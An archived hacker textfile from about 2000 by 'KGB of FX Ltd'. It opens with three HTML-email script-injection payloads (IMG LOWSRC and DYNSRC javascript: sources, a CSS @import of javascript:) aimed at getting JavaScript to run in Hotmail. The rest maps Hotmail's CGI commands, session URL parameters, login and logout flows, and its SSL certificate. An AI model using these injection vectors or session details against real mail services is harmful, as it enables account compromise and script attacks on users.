💾 Archived View for gemini.theuse.net › textfiles.com › uploads › hotmail.txt captured on 2022-01-08 at 20:59:11.

View Raw

More Information

-=-=-=-=-=-=-

The code that must be included in HTML email message is:
--------------------------------------------------------
<IMG LOWSRC="javascript:alert('Javascript is executed')">
--------------------------------------------------------

The code that must be included in HTML email message is:
--------------------------------------------------------
<IMG DYNSRC="javascript:alert('Javascript is executed')">
--------------------------------------------------------

The code that must be included in HTML email message is:
--------------------------------------------------------
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
--------------------------------------------------------


209.185.130.251                        <fh_foxhound@hotmail.com>

       UnderStanding the Hotmail Server by KGB of FX Ltd.

       
//this is the original file i made when doing my research
logins are changed, this may be spread only if author and source are known
-KGB, FX Ltd//

http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?disk=216.33.148.69_d679&login=
boink&f=33792&curmbox=ACTIVE&_lang= (here comes the e-mail id set by server)




(viewing main)
					hotmaillogin
        www.adress van hotmail          box(main window)   
                 |                          |
http://lw4fd.law4.hotmail.msn.com/cgi-bin/HoTMaiL?disk=216.33.148.69_d679&login
=boink&f=33792&curmbox=ACTIVE&_lang=			|              |
   |         |					   ip  van comp        |
   |       box nr.?				  op hotmail serv  disk nr.
  login


(viewing the email)
					get msg command
                                            |     
http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?disk=216.33.148.69_d679&login=boinkc&f
=33792&curmbox=ACTIVE&_lang=&msg=MSG947245205.4&start=171614&len=1116&mfs=1023
                                    |         |         |         |        |
                                    |      = dif     = dif      =dif  stays the
                             MSG ID op     per msg   per msg   permsg	  same
                             hotmail Serv.
				(email)


lw4fd.law4 2 dezelfde cijfer means LOGGED in
 |
loginwindow?

Notes:


http://lw7fd.law7.hotmail.msn.com/cgi-bin/HoTMaiL?disk=216.33.236.69_d1048&login=boink&f
         |
      changes
     (lw4fd.law4)     

=33792&curmbox=ACTIVE&_lang=&fti=yes
   |				|	
stays the same			first time login?



Note

  then when you enter it again,(or reload) without loging out the statement will go away.

&fti=yes        /firstime
&t=957029515    /logout
      |
    changes 
   everytime
   u logout


(folders)
curmbox=ACTIVE            ;main (inbox)
curmbox=trAsH             ;deleted msg
curmbox=SaVed             ;sent msg
curmbox=drAfT             ;drafts
curmbox=HM_BuLkMail       ;bulk mail box

curmbox = current mail box



password?hint=1&disk=(ip)

block?disk=216.33.148.69_d679&login=boink&f=33792&curmbox=ACTIVE&_lang=&from=options
 |							     |			|	
cgi command						   inbox	    the folder from where
block sender						                    you came from


CGI Commands (after the /cgi-bin/)

compose?              ;write mail msg
HoTMail?              ;hotmail main
getmsg?               ;read received e-mail
adresses?             ;get adress
folders?              ;look at folders
person?               ;personal info
password?             ;change password
password?hint=1&disk= ;secret question
options?              ;view options
prefs?                ;preferences
protect?              ;inbox protector
block?                ;block sender
filters?              ;filters
pop?                  ;popmail




(change user)

http://lc5.law5.hotmail.passport.com/ppsecure/login?_lang=&id=2&ct=957030843
					|			|       |
                                  passport.com                 logout	|
								   logout nr.	



		 must be passport.com?	selectbox
			|		   |
http://lw7fd.law7.hotmail.msn.com/cgi-bin/sbox?disk=216.33.236.69_d1048&login=boink&f=
33792&curmbox=ACTIVE&_lang=&t=2AAAAAAAAD%2a3LRd%
2aQjGF3cIrAaxAfCyIELUCYwG6%2aIWUB3WWcdYsOQvw%24%24&p=2AAAAAAAAH70c3HrzX7%21fuNh9H8nwxN5Ren
ZdWZ3BOS2L4ORXyOppgMM5bCs5Us1owd6qJdSmq%
21FfkLC8t4V1duiEhNZT49ev9XXtV4ox6LCOTiYJpMUHUFva0jcDNKNuP8TOLmZj%216rY%24
         |
    encrypted password?

(change user)
http://lc5.law5.hotmail.passport.com/ppsecure/logout?id=2&ct=957038276&ru=http%3a%2f%2flc5%
2elaw5%2ehotmail%2epassport%2ecom%2fppsecure%2flogin%
3f_lang%3d%26id%3d2%26ct%3d957038276&disk=216.33.236.69_d1048&login=boink&f=33792&curmbox=
ACTIVE&_lang=


        indicates
        (hotmail.com)
            |
http://lc4.law5.hotmail.passport.com/cgi-bin/login
        |                 | 
     listcheck         checks
     from            login/pass
     1 to 8?


Note

  but when logged in numbers are the same and lc changes to lw(nr)fd.


(login check with right pw)
http://lw4fd.law4.hotmail.msn.com/cgi-bin/sbox?disk=216.33.148.69_d679&login=boink&f=
33792&curmbox=ACTIVE&_lang=&t=2AAAAAAAADEggSrB8teztqIsFxZv%21v5JVU4lgYH4sd2ofd5Iw8be5XIA%
24%24&p=2AAAAAAAADJRULJQWHrrecKIHZFbjDCtLTuDlW8aDSIGF5pLq5%2aB34dGsNu1WCIy%2azLszp%
21aG3zwbR3YNKAJuyLSHVvYbn2zAFUYX3jheJKVEFpvUTAhZipphuHS4FJIjg


(with wrong pw)
/cgi-bin/dologin
(checks password if right go to (example) lw4fd.law4 if not goes to (example) lc4.law5)



Note



http://lc4.law5.hotmail.passport.com/ppsecure/logout?id=2&ct=957885690&ru=
http%3a%2f%2flc4%2elaw5%2ehotmail%2epassport%2ecom%2fppsecure%2flogin%3f_lang
%3d%26id%3d2%26ct%3d957885690&disk=216.33.148.69_d679&login=boink&f=33792&curmbox
=ACTIVE&_lang=


			- ABOUT HOTMAIL ENCRYPTION -
				  ((SSL))

Their Certificate is given to passport.com
Given by Secure Server Certification Authority, RSA DAta Security Inc. 

Version V1
serialnumber = 04B8 D90D FF0E 853B D1A1 F88D 91BE 09FD

The certificate expires thursday 31 august 2000 1:59:59

The public key is written in RSA (Rivest-Shamir-Adelman) 512 bits:

3048 0241 00C0 8EF1 2908 4FD1 C66C 16A1 8C26 AEC7 5C11 6F3D 0EA2 5389 
532D 63A3 7F76 47CC 9C7E D363 EE45 0EF3 FE1A 6EEF EF6A 3510 E743 C69F 
81E0 8A1D F9A7 BCE6 47DB 0F3F 1F02 0301 0001

Vingerprint-Algorithm  is in SHA1:

E328 52BC F857 D4D3 A15D 54B7 25E0 AAE4 9255 A2CB

Digital Signature is in MD5 and RSA



GrtZ

KGB ---=> FX Ltd.